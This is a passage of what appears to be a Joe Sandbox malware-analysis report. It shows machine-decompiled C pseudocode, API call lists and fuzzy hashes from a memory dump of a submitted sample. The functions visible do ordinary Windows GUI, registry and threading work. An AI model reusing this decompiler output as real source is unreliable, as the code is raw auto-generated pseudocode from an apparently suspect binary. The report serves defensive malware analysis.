                  					 *((intOrPtr*)( *_t63 + 0x50))();
                  					 *((intOrPtr*)(_t72 + 0x48)) = 0;
                  				}
                  				_t64 =  *(_t72 + 0x4c);
                  				if(_t64 != 0) {
                  					 *((intOrPtr*)( *_t64 + 4))(1);
                  				}
                  				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
                  				_t83 =  *(_t72 + 0x3c) & 1;
                  				if(( *(_t72 + 0x3c) & 1) != 0) {
                  					_t71 =  *((intOrPtr*)(E0041F396(1, _t64, _t69, _t72, _t83) + 0x3c));
                  					if(_t71 != 0) {
                  						_t85 =  *(_t71 + 0x20);
                  						if( *(_t71 + 0x20) != 0) {
                  							E00431160(_t71,  &_v52, 0, 0x30);
                  							_t48 =  *(_t72 + 0x20);
                  							_v44 = _t48;
                  							_v40 = _t48;
                  							_v52 = 0x2c;
                  							_v48 = 1;
                  							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
                  						}
                  					}
                  				}
                  				_t34 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
                  				_t61 = _t34;
                  				E0040ED96(_t72, _t85);
                  				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t34) {
                  					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf8))());
                  					if(_t43 != 0) {
                  						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
                  					}
                  				}
                  				E0040EEC5(_t61, _t72);
                  				return  *((intOrPtr*)( *_t72 + 0x11c))();
                  			}




















                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: LongWindow$MessageSend_memset
                  • String ID: ,
                  • API String ID: 2997958587-3772416878
                  • Opcode ID: b20ac35b66c4cdd383068926631af7f25a1f3221c8ae416a670efe0955ee868a
                  • Instruction ID: 7f9eb07dc8cd5887cb77f9411831f1f819b3d5f976bf49b5c8f03c9bda67ac66
                  • Opcode Fuzzy Hash: b20ac35b66c4cdd383068926631af7f25a1f3221c8ae416a670efe0955ee868a
                  • Instruction Fuzzy Hash: 0131A331600715AFCB20AF76C884A6AB7E4BF48314F15093EF545A7BD2DB39E815CB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 70%
                  			E00416B30(void* __ebx, void* __ecx, void __edx, void* __edi, void* __esi, void* __eflags) {
                  				void _t36;
                  				void* _t46;
                  				long _t60;
                  				void* _t65;
                  				void* _t81;
                  				void* _t82;
                  				intOrPtr _t90;
                  
                  				_t77 = __edx;
                  				_t68 = __ecx;
                  				_t67 = __ebx;
                  				_push(0x124);
                  				E00431B04(E0044B492, __ebx, __edi, __esi);
                  				_t81 = __ecx;
                  				 *(_t82 - 0x120) = 0;
                  				 *(_t82 - 0x12c) = 0;
                  				_t36 = E004165DF(__ecx, __edx);
                  				 *(_t82 - 0x128) = _t36;
                  				if(_t36 != 0) {
                  					do {
                  						_t65 = _t82 - 0x128;
                  						_push(_t65);
                  						_t68 = _t81;
                  						E004165F0();
                  						if(_t65 != 0) {
                  							_t77 =  *_t65;
                  							_t68 = _t65;
                  							 *((intOrPtr*)( *_t65 + 0xc))(0, 0xfffffffc, 0, 0);
                  						}
                  					} while ( *(_t82 - 0x128) != 0);
                  				}
                  				if( *((intOrPtr*)(_t81 + 0x54)) != 0) {
                  					_t90 =  *((intOrPtr*)(_t81 + 0x68));
                  					_t91 = _t90 == 0;
                  					if(_t90 == 0) {
                  						E00406436(_t67, _t68, 0, _t81, _t91);
                  					}
                  					_push("Software\\");
                  					E00406039(_t67, _t82 - 0x11c, _t77, 0, _t81, _t91);
                  					 *((intOrPtr*)(_t82 - 4)) = 0;
                  					E00405EC1(_t82 - 0x11c,  *((intOrPtr*)(_t81 + 0x54)));
                  					_push("\\");
                  					_push(_t82 - 0x11c);
                  					_push(_t82 - 0x130);
                  					_t46 = E00416856(_t67, 0, _t81, _t91);
                  					_push( *((intOrPtr*)(_t81 + 0x68)));
                  					 *((char*)(_t82 - 4)) = 1;
                  					_push(_t46);
                  					_push(_t82 - 0x124);
                  					E00416856(_t67, 0, _t81, _t91);
                  					 *((char*)(_t82 - 4)) = 3;
                  					E004010B0( *((intOrPtr*)(_t82 - 0x130)) + 0xfffffff0, _t77);
                  					_push(_t82 - 0x124);
                  					_t81 = 0x80000001;
                  					_push(0x80000001);
                  					E00416900(_t67, _t77, 0, 0x80000001, _t91);
                  					if(RegOpenKeyA(0x80000001,  *(_t82 - 0x11c), _t82 - 0x120) == 0) {
                  						_t60 = RegEnumKeyA( *(_t82 - 0x120), 0, _t82 - 0x118, 0x104);
                  						_t93 = _t60 - 0x103;
                  						if(_t60 == 0x103) {
                  							_push(_t82 - 0x11c);
                  							_push(0x80000001);
                  							E00416900(_t67, _t77, 0, 0x80000001, _t93);
                  						}
                  						RegCloseKey( *(_t82 - 0x120));
                  					}
                  					RegQueryValueA(_t81,  *(_t82 - 0x124), _t82 - 0x118, _t82 - 0x12c);
                  					E004010B0( &(( *(_t82 - 0x124))[0xfffffffffffffff0]), _t77);
                  					E004010B0( &(( *(_t82 - 0x11c))[0xfffffffffffffff0]), _t77);
                  				}
                  				return E00431B87(_t67, 0, _t81);
                  			}











                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 00416B3A
                  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00416C20
                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 00416C3D
                  • RegCloseKey.ADVAPI32(?), ref: 00416C5D
                  • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 00416C78
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseEnumH_prolog3_OpenQueryValue
                  • String ID: Software\
                  • API String ID: 1666054129-964853688
                  • Opcode ID: 2c69f8e9fb3cf1b68887677988b198adb23b804070d639b6a360ee49bf6eecd0
                  • Instruction ID: 2bc0dbd4b1b81aecab4d277785a25c5ce037b4448173150856faaa691a74c426
                  • Opcode Fuzzy Hash: 2c69f8e9fb3cf1b68887677988b198adb23b804070d639b6a360ee49bf6eecd0
                  • Instruction Fuzzy Hash: 29418F718001289BCF21EB65CC45ADEB7B9AF49314F1001EAF145E22A1DB389AD1CF99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E004146D0(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t31;
                  				char* _t37;
                  				char* _t46;
                  				intOrPtr _t51;
                  				void* _t61;
                  				char* _t64;
                  				signed int _t72;
                  				void* _t74;
                  
                  				_t61 = __edx;
                  				_t53 = __ecx;
                  				_push(4);
                  				E00431A9B(E0044C66E, __ebx, __edi, __esi);
                  				_t51 = __ecx;
                  				 *((intOrPtr*)(_t74 - 0x10)) = __ecx;
                  				_t76 =  *(_t74 + 0xc) & 0x00000004;
                  				 *((intOrPtr*)(__ecx + 0xc8)) = 1;
                  				_t31 = 0x80c83b00;
                  				if(( *(_t74 + 0xc) & 0x00000004) != 0) {
                  					_t31 = 0x80c83300;
                  				}
                  				if(E00424F26(_t53, _t76, 0, 0, 0x44f0f5, _t31, 0x46279c,  *((intOrPtr*)(_t74 + 8)), 0) != 0) {
                  					asm("sbb esi, esi");
                  					_t72 = ( ~( *(_t74 + 0xc) & 0x00005000) & 0xfffff000) + 0x00002000 |  *(_t74 + 0xc) & 0x00000040;
                  					_t64 = E004133BB(_t51, 0);
                  					__eflags = _t64;
                  					if(_t64 != 0) {
                  						DeleteMenu(_t64[4], 0xf000, 0);
                  						DeleteMenu(_t64[4], 0xf020, 0);
                  						DeleteMenu(_t64[4], 0xf030, 0);
                  						DeleteMenu(_t64[4], 0xf120, 0);
                  						E004014C0(_t74 + 0xc, _t61);
                  						 *(_t74 - 4) =  *(_t74 - 4) & 0x00000000;
                  						_t46 = E00402720(_t74 + 0xc, 0xf011);
                  						__eflags = _t46;
                  						if(_t46 != 0) {
                  							DeleteMenu(_t64[4], 0xf060, 0);
                  							AppendMenuA(_t64[4], 0, 0xf060,  *(_t74 + 0xc));
                  						}
                  						 *(_t74 - 4) =  *(_t74 - 4) | 0xffffffff;
                  						__eflags =  &(( *(_t74 + 0xc))[0xfffffffffffffff0]);
                  						E004010B0( &(( *(_t74 + 0xc))[0xfffffffffffffff0]), _t61);
                  						_t51 =  *((intOrPtr*)(_t74 - 0x10));
                  					}
                  					_t65 = _t51 + 0xf8;
                  					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t51 + 0xf8)) + 0x17c))( *((intOrPtr*)(_t74 + 8)), _t72 | 0x50000000, 0xe81f);
                  					__eflags = _t37;
                  					if(_t37 != 0) {
                  						E004133D6(_t65, _t51);
                  						_t37 = 1;
                  					}
                  					 *(_t51 + 0xc8) =  *(_t51 + 0xc8) & 0x00000000;
                  					goto L4;
                  				} else {
                  					 *(_t51 + 0xc8) = 0;
                  					L4:
                  					return E00431B73(_t37);
                  				}
                  			}












                  APIs
                  • __EH_prolog3.LIBCMT ref: 004146D7
                    • Part of subcall function 004133BB: GetSystemMenu.USER32(?,?), ref: 004133C6
                  • DeleteMenu.USER32(?,0000F000,00000000), ref: 00414767
                  • DeleteMenu.USER32(?,0000F020,00000000), ref: 00414773
                  • DeleteMenu.USER32(?,0000F030,00000000), ref: 0041477F
                  • DeleteMenu.USER32(?,0000F120,00000000), ref: 0041478B
                  • DeleteMenu.USER32(?,0000F060,00000000,0000F011), ref: 004147B4
                  • AppendMenuA.USER32 ref: 004147C3
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu$Delete$AppendH_prolog3System
                  • String ID:
                  • API String ID: 1427010815-0
                  • Opcode ID: aff83d87a85b773f964931b9adbbd999ef37a797d0e26fff4b4aa0b383d6ff58
                  • Instruction ID: fa170293c447da0cf328da5eff8f5daf512e33c4efadb7408d9be9ec5d0d8651
                  • Opcode Fuzzy Hash: aff83d87a85b773f964931b9adbbd999ef37a797d0e26fff4b4aa0b383d6ff58
                  • Instruction Fuzzy Hash: 8331E671640606BBEB205F21CC86FB97660AF44754F108239FA296F2E1DB78AC50D75C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E00416900(signed int __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				long _t38;
                  				void* _t51;
                  				void* _t54;
                  				signed int _t57;
                  				void* _t67;
                  				void* _t71;
                  				void* _t73;
                  				void* _t76;
                  
                  				_t76 = __eflags;
                  				_t67 = __edx;
                  				_t57 = __ebx;
                  				_push(0x124);
                  				E00431B3A(E0044B41E, __ebx, __edi, __esi);
                  				_t71 =  *(_t73 + 8);
                  				 *(_t73 - 0x12c) = _t71;
                  				E00405562(_t73 - 0x124, _t76,  *((intOrPtr*)(_t73 + 0xc)));
                  				 *((intOrPtr*)(_t73 - 4)) = 0;
                  				if(_t71 == 0x80000000) {
                  					_t51 = E0041EC3D();
                  					_t78 = _t51 - 1;
                  					if(_t51 == 1) {
                  						_push(_t73 - 0x124);
                  						_push("Software\\Classes\\");
                  						_push(_t73 - 0x120);
                  						_t54 = E004168AB(__ebx, 0, _t71, _t78);
                  						 *((char*)(_t73 - 4)) = 1;
                  						E004056C2(__ebx, _t73 - 0x124, _t54);
                  						 *((char*)(_t73 - 4)) = 0;
                  						E004010B0( *((intOrPtr*)(_t73 - 0x120)) + 0xfffffff0, _t67);
                  						 *(_t73 - 0x12c) = 0x80000001;
                  					}
                  				}
                  				_t38 = RegOpenKeyA( *(_t73 - 0x12c),  *(_t73 - 0x124), _t73 - 0x128);
                  				_t72 = _t38;
                  				if(_t38 != 0) {
                  					L11:
                  					__eflags =  &(( *(_t73 - 0x124))[0xfffffffffffffff0]);
                  					E004010B0( &(( *(_t73 - 0x124))[0xfffffffffffffff0]), _t67);
                  					return E00431B96(_t57, 0, _t72);
                  				} else {
                  					while(1) {
                  						_t72 = RegEnumKeyA( *(_t73 - 0x128), 0, _t73 - 0x11c, 0x104);
                  						_t81 = _t72;
                  						if(_t72 != 0) {
                  							break;
                  						}
                  						_push(_t73 - 0x11c);
                  						 *((char*)(_t73 - 4)) = 2;
                  						E00406039(_t57, _t73 - 0x120, _t67, 0, _t72, _t81);
                  						 *((char*)(_t73 - 4)) = 3;
                  						_t72 = E00416900(_t57, _t67, 0, _t72, _t81,  *(_t73 - 0x128), _t73 - 0x120);
                  						_t57 = _t57 & 0xffffff00 | _t72 != 0x00000000;
                  						 *((char*)(_t73 - 4)) = 2;
                  						E004010B0( *((intOrPtr*)(_t73 - 0x120)) + 0xfffffff0, _t67);
                  						if(_t57 != 0) {
                  							break;
                  						}
                  						 *((intOrPtr*)(_t73 - 4)) = 0;
                  					}
                  					__eflags = _t72 - 0x103;
                  					if(_t72 == 0x103) {
                  						L9:
                  						_t72 = RegDeleteKeyA( *(_t73 - 0x12c),  *(_t73 - 0x124));
                  						L10:
                  						RegCloseKey( *(_t73 - 0x128));
                  						goto L11;
                  					}
                  					__eflags = _t72 - 0x3f2;
                  					if(_t72 != 0x3f2) {
                  						goto L10;
                  					}
                  					goto L9;
                  				}
                  			}












                  APIs
                  • __EH_prolog3_catch_GS.LIBCMT ref: 0041690A
                  • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00416998
                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 004169BB
                    • Part of subcall function 004168AB: __EH_prolog3.LIBCMT ref: 004168B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: EnumH_prolog3H_prolog3_catch_Open
                  • String ID: Software\Classes\
                  • API String ID: 3518408925-1121929649
                  • Opcode ID: e3c2d5f4c53faedf68658fe16a846a1c51aaa5f659ad65bbad251e652c178414
                  • Instruction ID: 9bc735b9683b0f1466790649354c91e8bae961b69db05001f0a35a48de0ea7d3
                  • Opcode Fuzzy Hash: e3c2d5f4c53faedf68658fe16a846a1c51aaa5f659ad65bbad251e652c178414
                  • Instruction Fuzzy Hash: D931A331C001289BCF21EB64CD40BDDB7B4AF09350F0141EAE99973291DA345FD48F95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E0040A4A9(intOrPtr* __ecx, long _a4) {
                  				void* __ebx;
                  				void* _t26;
                  				signed int _t27;
                  				long _t40;
                  				signed int _t43;
                  				intOrPtr* _t54;
                  
                  				_t47 = __ecx;
                  				_t43 = _a4;
                  				_t54 = __ecx;
                  				if(_t43 != 0 && ( *(__ecx + 0x3c) & 0x00000004) != 0) {
                  					E00412C76(__ecx, 0);
                  					return SetFocus(0);
                  				}
                  				_t26 = E0040EE3C(_t43, _t47, GetParent( *(_t54 + 0x20)));
                  				if(_t26 == 0) {
                  					L5:
                  					if(_t43 != 0) {
                  						_t27 =  *(_t54 + 0x3c);
                  						if(_t27 < 0) {
                  							 *(_t54 + 0x3c) = _t27 & 0xffffff7f;
                  							 *((intOrPtr*)( *_t54 + 0x104))();
                  							_a4 =  *(_t54 + 0x20);
                  							if(GetActiveWindow() == _a4) {
                  								SendMessageA(_a4, 6, 1, 0);
                  							}
                  						}
                  						if(( *(_t54 + 0x3c) & 0x00000020) != 0) {
                  							SendMessageA( *(_t54 + 0x20), 0x86, 1, 0);
                  						}
                  					} else {
                  						if( *((intOrPtr*)(_t54 + 0xb8)) == 0) {
                  							 *(_t54 + 0x3c) =  *(_t54 + 0x3c) | 0x00000080;
                  							 *((intOrPtr*)( *_t54 + 0x100))();
                  						}
                  					}
                  					asm("sbb ebx, ebx");
                  					return E00408A69(_t54, ( ~_t43 & 0xfffffff0) + 0x20);
                  				} else {
                  					_a4 = 0;
                  					GetWindowThreadProcessId( *(_t26 + 0x20),  &_a4);
                  					_t40 = GetCurrentProcessId();
                  					if(_t40 == _a4) {
                  						return _t40;
                  					}
                  					goto L5;
                  				}
                  			}










                  APIs
                  • SetFocus.USER32(00000000,00000000), ref: 0040A4C9
                  • GetParent.USER32(?), ref: 0040A4D7
                  • GetWindowThreadProcessId.USER32(?,?), ref: 0040A4F2
                  • GetCurrentProcessId.KERNEL32 ref: 0040A4F8
                  • GetActiveWindow.USER32 ref: 0040A54B
                  • SendMessageA.USER32(?,00000006,00000001,00000000), ref: 0040A55F
                  • SendMessageA.USER32(?,00000086,00000001,00000000), ref: 0040A573
                    • Part of subcall function 00412C76: EnableWindow.USER32(?,?), ref: 00412C87
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$MessageProcessSend$ActiveCurrentEnableFocusParentThread
                  • String ID:
                  • API String ID: 2169720751-0
                  • Opcode ID: dfdcc4aceaedbd86c3665efdada2bbe5d0073950082cda493ab0cb21491c4667
                  • Instruction ID: 0560ffd8090ea321ddfb3cc0bc89d5341b088f6257bcd32caec06168c9843b40
                  • Opcode Fuzzy Hash: dfdcc4aceaedbd86c3665efdada2bbe5d0073950082cda493ab0cb21491c4667
                  • Instruction Fuzzy Hash: E621F171200700BFCB219F25CCC8F6E7BA4BF44740F24452AF589A72E0D7B8B8508B5A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00440043() {
                  				intOrPtr _t5;
                  				intOrPtr _t6;
                  				intOrPtr _t10;
                  				void* _t12;
                  				intOrPtr _t15;
                  				intOrPtr* _t16;
                  				signed int _t19;
                  				signed int _t20;
                  				intOrPtr _t26;
                  				intOrPtr _t27;
                  
                  				_t5 =  *0x468660;
                  				_t26 = 0x14;
                  				if(_t5 != 0) {
                  					if(_t5 < _t26) {
                  						_t5 = _t26;
                  						goto L4;
                  					}
                  				} else {
                  					_t5 = 0x200;
                  					L4:
                  					 *0x468660 = _t5;
                  				}
                  				_t6 = E004381D6(_t5, 4);
                  				 *0x467648 = _t6;
                  				if(_t6 != 0) {
                  					L8:
                  					_t19 = 0;
                  					_t15 = 0x463fd0;
                  					while(1) {
                  						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                  						_t15 = _t15 + 0x20;
                  						_t19 = _t19 + 4;
                  						if(_t15 >= 0x464250) {
                  							break;
                  						}
                  						_t6 =  *0x467648; // 0x25e20b8
                  					}
                  					_t27 = 0xfffffffe;
                  					_t20 = 0;
                  					_t16 = 0x463fe0;
                  					do {
                  						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x468680 + (_t20 >> 5) * 4))));
                  						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                  							 *_t16 = _t27;
                  						}
                  						_t16 = _t16 + 0x20;
                  						_t20 = _t20 + 1;
                  					} while (_t16 < 0x464040);
                  					return 0;
                  				} else {
                  					 *0x468660 = _t26;
                  					_t6 = E004381D6(_t26, 4);
                  					 *0x467648 = _t6;
                  					if(_t6 != 0) {
                  						goto L8;
                  					} else {
                  						_t12 = 0x1a;
                  						return _t12;
                  					}
                  				}
                  			}














                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __calloc_crt
                  • String ID: @@F$PBF$`vF$?F
                  • API String ID: 3494438863-1129309999
                  • Opcode ID: 1a2e1c73d2f0b5ee1c020fbac76cde2fdd918bf510956deff6eadb29a4ec2292
                  • Instruction ID: a5c93d0391fce3b3b5f1e76609cc71b27c325a532c4fd8429ec35ff82f20e995
                  • Opcode Fuzzy Hash: 1a2e1c73d2f0b5ee1c020fbac76cde2fdd918bf510956deff6eadb29a4ec2292
                  • Instruction Fuzzy Hash: 7C1191317097115BF7288E2DBC50B662391A785728F24423FE715DA3A4FAB8D891868E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00426499(intOrPtr __ecx) {
                  				void* _v8;
                  				void* _v12;
                  				void* _v16;
                  				int _v20;
                  				intOrPtr _v24;
                  				intOrPtr _t32;
                  
                  				_t32 = __ecx;
                  				_v24 = __ecx;
                  				_v16 = 0;
                  				_v8 = 0;
                  				_v12 = 0;
                  				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
                  					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
                  				}
                  				if(_v8 != 0) {
                  					RegCloseKey(_v8);
                  				}
                  				if(_v12 != 0) {
                  					RegCloseKey(_v12);
                  				}
                  				return _v16;
                  			}









                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 004264C9
                  • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 004264EC
                  • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00426508
                  • RegCloseKey.ADVAPI32(?), ref: 00426518
                  • RegCloseKey.ADVAPI32(?), ref: 00426522
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseCreate$Open
                  • String ID: software
                  • API String ID: 1740278721-2010147023
                  • Opcode ID: baa5dd68dee05fadf222446a8f3323f9c01591b1d0c43eda07168c0e41c926bb
                  • Instruction ID: 3f12b4e016f44e42d78fa2a8c8e700cc1342d59c6eca5ba0814baf6782e48a0c
                  • Opcode Fuzzy Hash: baa5dd68dee05fadf222446a8f3323f9c01591b1d0c43eda07168c0e41c926bb
                  • Instruction Fuzzy Hash: C411E676D00128BB8B21DF9AEC88CDFBFBCEF89744B5100AAB504A2115D6719A44DBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 62%
                  			E00401000(intOrPtr* _a4) {
                  				void* _t21;
                  				intOrPtr* _t38;
                  				void* _t42;
                  
                  				_t38 = _a4;
                  				if(WaitForSingleObject( *(_t38 + 0x10), 0xffffffff) == 0) {
                  					while(WaitForSingleObject( *(_t38 + 0x18), 0) != 0) {
                  						ResetEvent( *(_t38 + 0x14));
                  						_push( *((intOrPtr*)(_t38 + 0x24)));
                  						_push( *((intOrPtr*)(_t38 + 0x20)));
                  						_push(_t38);
                  						_push(_t38 + 8);
                  						_push( *((intOrPtr*)(_t38 + 4)));
                  						_push( *_t38);
                  						_t21 = E004042A0( *_t38);
                  						_t42 = _t42 + 0x18;
                  						SetEvent( *(_t38 + 0x14));
                  						if(_t21 != 0) {
                  							PostMessageA( *(_t38 + 0xc), 0x402, 0, 0);
                  							if(WaitForSingleObject( *(_t38 + 0x10), 0xffffffff) == 0) {
                  								continue;
                  							}
                  						}
                  						break;
                  					}
                  				}
                  				SetEvent( *(_t38 + 0x1c));
                  				return 0;
                  			}






                  APIs
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401012
                  • WaitForSingleObject.KERNEL32(?,00000000), ref: 00401026
                  • ResetEvent.KERNEL32(?), ref: 00401030
                    • Part of subcall function 004042A0: WaitForSingleObject.KERNEL32(?,00000000,?,?,?,745E8A10,73BCF750,0040104F,?,?,?,?,?,?), ref: 004042CA
                    • Part of subcall function 004042A0: WaitForSingleObject.KERNEL32(?,00000000,?,?,745E8A10,73BCF750,0040104F,?,?,?,?,?,?), ref: 004042DE
                    • Part of subcall function 004042A0: SendMessageA.USER32(?,00000401,00000064,00000000), ref: 00404353
                  • SetEvent.KERNEL32(?), ref: 00401058
                  • PostMessageA.USER32 ref: 0040106F
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401077
                  • SetEvent.KERNEL32(?), ref: 00401083
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ObjectSingleWait$Event$Message$PostResetSend
                  • String ID:
                  • API String ID: 2693790096-0
                  • Opcode ID: 7c818635be2d97c96777eab090e09d629f6dcbd405f1c48e9043e2034b7e17b1
                  • Instruction ID: 0d77731ecac0447bacbc28320ec0c646970e3b0a9206e2ca7128ab913cbacf71
                  • Opcode Fuzzy Hash: 7c818635be2d97c96777eab090e09d629f6dcbd405f1c48e9043e2034b7e17b1
                  • Instruction Fuzzy Hash: 82111F75200701ABD620DFAADC84E13B3EDBF88B10B108A2DB665D36D0DA74F8008B68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetParent.USER32(0000E900), ref: 0040CEF0
                  • GetWindowRect.USER32 ref: 0040CF0B
                  • ScreenToClient.USER32 ref: 0040CF1E
                  • ScreenToClient.USER32 ref: 0040CF27
                  • EqualRect.USER32 ref: 0040CF31
                  • DeferWindowPos.USER32(?,0000E900,00000000,?,?,?,?,00000014), ref: 0040CF59
                  • SetWindowPos.USER32(0000E900,00000000,?,?,?,?,00000014,?,00000001), ref: 0040CF63
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$ClientRectScreen$DeferEqualParent
                  • String ID:
                  • API String ID: 443303494-0
                  • Opcode ID: 9dd0b80c57cd055b5c3aae39b5d4aa4e3f334b3c2dd04950780753353c1d00f6
                  • Instruction ID: cfd9feb092fbb54a836aacfe93016eac0eb2fe96b6d959632a20acd86b66a086
